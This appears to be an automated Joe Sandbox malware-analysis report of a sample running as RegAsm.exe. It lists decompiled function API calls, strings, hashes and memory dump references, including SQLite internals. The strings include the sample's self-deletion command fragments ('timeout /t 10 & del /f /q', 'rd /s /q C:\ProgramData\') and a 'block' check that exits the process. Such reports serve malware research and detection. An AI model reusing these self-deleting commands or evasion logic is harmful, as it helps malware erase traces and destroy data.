Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409605
HeapAlloc.KERNEL32(00000000), ref: 0040960C
lstrcat.KERNEL32(00000000,00000000), ref: 0040972F
lstrcat.KERNEL32(00000000,00426E34), ref: 0040973D
lstrcat.KERNEL32(00000000,00000000), ref: 0040974F
lstrcat.KERNEL32(00000000,00426E38), ref: 0040975D
lstrlenA.KERNEL32(00000000), ref: 00409870
lstrlenA.KERNEL32(00000000), ref: 0040987E

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

memset.MSVCRT ref: 004098D6

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
String ID:
API String ID: 1592390033-0
Opcode ID: 66b2b2354b6e31eb49aeaddc9213c6975f92ba9ecefcf5aa259d2fafae4e7029
Instruction ID: a2ad9b8be682fbfa14b4219c609b10a199413157f7c19288a990becf1319673b
Opcode Fuzzy Hash: 66b2b2354b6e31eb49aeaddc9213c6975f92ba9ecefcf5aa259d2fafae4e7029
Instruction Fuzzy Hash: BE027E31800149EEDF05EBA5DD5AAEEBB75AF15308F10805EF411721E2DFB81A88DF65

Function 00412B05 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412B0A
strtok_s.MSVCRT ref: 00412B3B
StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00412BD3

Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC

lstrcpy.KERNEL32(?,?), ref: 00412C8A
lstrcpy.KERNEL32(?,00000000), ref: 00412CC6
lstrcpy.KERNEL32(?,00000000), ref: 00412D0D
lstrcpy.KERNEL32(?,00000000), ref: 00412D54
lstrcpy.KERNEL32(?,00000000), ref: 00412D9B
strtok_s.MSVCRT ref: 00412EFE

Strings

false, xrefs: 00412BED
true, xrefs: 00412BCB

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$H_prologlstrlen
String ID: false$true
API String ID: 49562497-2658103896
Opcode ID: 061990c3b08a0635bf3f4056e9859e76a3b328a685a7464dcc7011e1d9a7acc5
Instruction ID: 28ff51836035da9e22a5c9aa9de9bbdbf0cb9688c1dfea4d9cbacd6e1c3e0fdf
Opcode Fuzzy Hash: 061990c3b08a0635bf3f4056e9859e76a3b328a685a7464dcc7011e1d9a7acc5
Instruction Fuzzy Hash: 44C17F7180020AAFDF14EFA4DD55EDE77BDAB19304F10405AF115E7292FB78AA88CB64

Function 1B7A5D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

rank, xrefs: 1B7A5FBB
crisismerge, xrefs: 1B7A5EF7
secure-delete, xrefs: 1B7A6031
deletemerge, xrefs: 1B7A5F64
automerge, xrefs: 1B7A5E59
hashsize, xrefs: 1B7A5DF0
pgsz, xrefs: 1B7A5D81
usermerge, xrefs: 1B7A5EAD

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: 9529329ea35c7e96d5c66d71cc31c608cb124cf102bd5ea31dc7ba4cf4aa3992
Instruction ID: 8a240d737fe895a5231c20282cdadf88b6772189bf5e09b86ee456d2088efa61
Opcode Fuzzy Hash: 9529329ea35c7e96d5c66d71cc31c608cb124cf102bd5ea31dc7ba4cf4aa3992
Instruction Fuzzy Hash: 1C7115BAF003115BCB049B39AC419CF7BD1AFD5212F08057AFA46D7211FB25E94AC7A2

Function 00412F2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412F34
StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,0041812A), ref: 00412F56
ExitProcess.KERNEL32 ref: 00412F61
strtok_s.MSVCRT ref: 00412F78

Strings

block, xrefs: 00412F41

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitH_prologProcessstrtok_s
String ID: block
API String ID: 3745986650-2199623458
Opcode ID: a31ed9966ca09a58ede8d56ec887742dac34a6e19051f4e0500378079127657b
Instruction ID: efd40a70527ba61e56956edfbf71d9e92ae8c2070f8535f2a0295be01fee5e6e
Opcode Fuzzy Hash: a31ed9966ca09a58ede8d56ec887742dac34a6e19051f4e0500378079127657b
Instruction Fuzzy Hash: 1841D778B44305EFD7209FB1EC49AEB3BECAB49746720442BF10BD7550EB7895808B58

Function 1B695E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B695F2B, 1B696253, 1B696385
recursive definition for %s.%s, xrefs: 1B695E4C
no such fts5 table: %s.%s, xrefs: 1B6962EA
%s at line %d of [%.10s], xrefs: 1B695F3A, 1B696262, 1B696394
misuse, xrefs: 1B695F35, 1B69625D, 1B69638F
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 1B695E6F
API called with finalized prepared statement, xrefs: 1B695F1F, 1B696247, 1B696379

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: f32639aa2f949b8e35baf0ec2d23263b49d67d1d571d30337e72bccc27efe3d2
Instruction ID: e87c4ba0fd62e0f3de350a31148fa9166ba35ab4a78361120d317d44cf25deec
Opcode Fuzzy Hash: f32639aa2f949b8e35baf0ec2d23263b49d67d1d571d30337e72bccc27efe3d2
Instruction Fuzzy Hash: 8602DFF09047029FDB108F24EC89BDB77E8BF64619F004529F88997342E771E949CBA2

Function 1B709980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B709A35, 1B709D90
SELECT %s, xrefs: 1B7099B1
API called with NULL prepared statement, xrefs: 1B709A04
%s at line %d of [%.10s], xrefs: 1B709A44, 1B709D9F
misuse, xrefs: 1B709A3F, 1B709D9A
no such function: %s, xrefs: 1B709E8C
API called with finalized prepared statement, xrefs: 1B709A19, 1B709D84

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: 7fa51d867fc149a7c986fe60b377ab85b390353349df70c827fc4ac97da120a1
Instruction ID: a0e7755e6aff06b9f5debefb02b1082ce5a5c5b28f7c4bf2938175315cae6c15
Opcode Fuzzy Hash: 7fa51d867fc149a7c986fe60b377ab85b390353349df70c827fc4ac97da120a1
Instruction Fuzzy Hash: A8E1E3B5A047419BD710CF28DC45BDB77E4BF96614F04052EF8899B381EB35E849C7A2

Function 1B6C3800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

integer, xrefs: 1B6C389A
no such rowid: %lld, xrefs: 1B6C39F8
cannot open value of type %s, xrefs: 1B6C38ED
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C3930
null, xrefs: 1B6C38E7
%s at line %d of [%.10s], xrefs: 1B6C393F
misuse, xrefs: 1B6C393A
real, xrefs: 1B6C3895, 1B6C38EC
API called with finalized prepared statement, xrefs: 1B6C3924

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: 42bb42ae947041409f7f9123bf38a92d971df37d8656d42810ae1487b9db2939
Instruction ID: 45bbda502499e448a4fab44c06d0865485ad0e188502222bd7ba15328bdcf5bd
Opcode Fuzzy Hash: 42bb42ae947041409f7f9123bf38a92d971df37d8656d42810ae1487b9db2939
Instruction Fuzzy Hash: E551F0F4A043019FDB109F28EC80AABB3A4FF94705F04092DEA568B741E731E948CBA5

Function 0041449C Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004144A1
memset.MSVCRT ref: 004144C1
memset.MSVCRT ref: 004144CD
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 004144E2

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

ShellExecuteEx.SHELL32(0000003C), ref: 0041466E
memset.MSVCRT ref: 0041467B
memset.MSVCRT ref: 00414689
ExitProcess.KERNEL32 ref: 0041469A

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Strings

/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004145C2
" & exit, xrefs: 0041460F
" & rd /s /q "C:\ProgramData\, xrefs: 00414558
<, xrefs: 00414649
/c timeout /t 10 & del /f /q ", xrefs: 00414508
" & exit, xrefs: 004145AB

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
API String ID: 1312519015-206210831
Opcode ID: ec9f61b1be2bdfd0664f32406c026455f27957cf7463b84261feb8543abe9ea2
Instruction ID: 1b5373ca0f5b308b8b126a3136e9c0fc33c149a05b0ed5981bb84e1abd997f8a
Opcode Fuzzy Hash: ec9f61b1be2bdfd0664f32406c026455f27957cf7463b84261feb8543abe9ea2
Instruction Fuzzy Hash: C2510371C04149EEDB05EBE5C995ADEBBB8AF14308F50419EE10573182DBB86BC8CBA5

Function 1B7AF370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

version, xrefs: 1B7AF560
content, xrefs: 1B7AF49D
docsize, xrefs: 1B7AF52D
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 1B7AF524, 1B7AF52C
id INTEGER PRIMARY KEY, xrefs: 1B7AF43E
id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 1B7AF51C
config, xrefs: 1B7AF549
k PRIMARY KEY, v, xrefs: 1B7AF544
, c%d, xrefs: 1B7AF469

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: 8ba178efed5bc19252f50ac34b4004406130504084e7a6eba37f69bb8e620c1e
Instruction ID: ba980aa02b2dead1c9cdd9f8e43797d4e0820f0ed64ea0c20b1f74169ff431f8
Opcode Fuzzy Hash: 8ba178efed5bc19252f50ac34b4004406130504084e7a6eba37f69bb8e620c1e
Instruction Fuzzy Hash: 0D5105719403129BC750AF34DC85BDE7BA8EF84A65F090625FC49DB281D735EA09CBA1

Function 1B693420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B693548, 1B693594
ATTACH x AS %Q, xrefs: 1B69346F
API called with NULL prepared statement, xrefs: 1B693517
%s at line %d of [%.10s], xrefs: 1B693557, 1B6935A3
misuse, xrefs: 1B693552, 1B69359E
API called with finalized prepared statement, xrefs: 1B69352C, 1B693588

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 405c164cbb1ef4d7aa405a98bb33d36cb91dbaf73fb6e62e6ee842295822457d
Instruction ID: fffd8338cd685674de04a7fb06bfe2b301cdf7c6bbdf34663cf2a57a168b8444
Opcode Fuzzy Hash: 405c164cbb1ef4d7aa405a98bb33d36cb91dbaf73fb6e62e6ee842295822457d
Instruction Fuzzy Hash: 77D19DF09043429FDB108F24ACC9BDB77E4BF64B15F045529E89A8B241E735E548CBA6

Function 1B764B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

UNIQUE constraint failed: %s.%s, xrefs: 1B764BC9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B764C2A
%s at line %d of [%.10s], xrefs: 1B764C39
SELECT * FROM %Q.%Q, xrefs: 1B764B25
rtree constraint failed: %s.(%s<=%s), xrefs: 1B764BF9
misuse, xrefs: 1B764C34
API called with finalized prepared statement, xrefs: 1B764C1E

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: c19190d05319c6f4bf030e4c10d4ec39d05282ce69e7673155aa080fba3cc300
Instruction ID: 1f983519b2a959fe8d07c5df08da3c2f6f0a64d3c326ff9b94a69122a1fd0b1c
Opcode Fuzzy Hash: c19190d05319c6f4bf030e4c10d4ec39d05282ce69e7673155aa080fba3cc300
Instruction Fuzzy Hash: 6A4104B1901215AFFB015F659C85FEF36ACEF90B55F000529FD4896380EB21E954C6B6

Function 1B817C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname1, xrefs: 1B817CC9
%s%c%s, xrefs: 1B817C7A
winFullPathname2, xrefs: 1B817D35

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
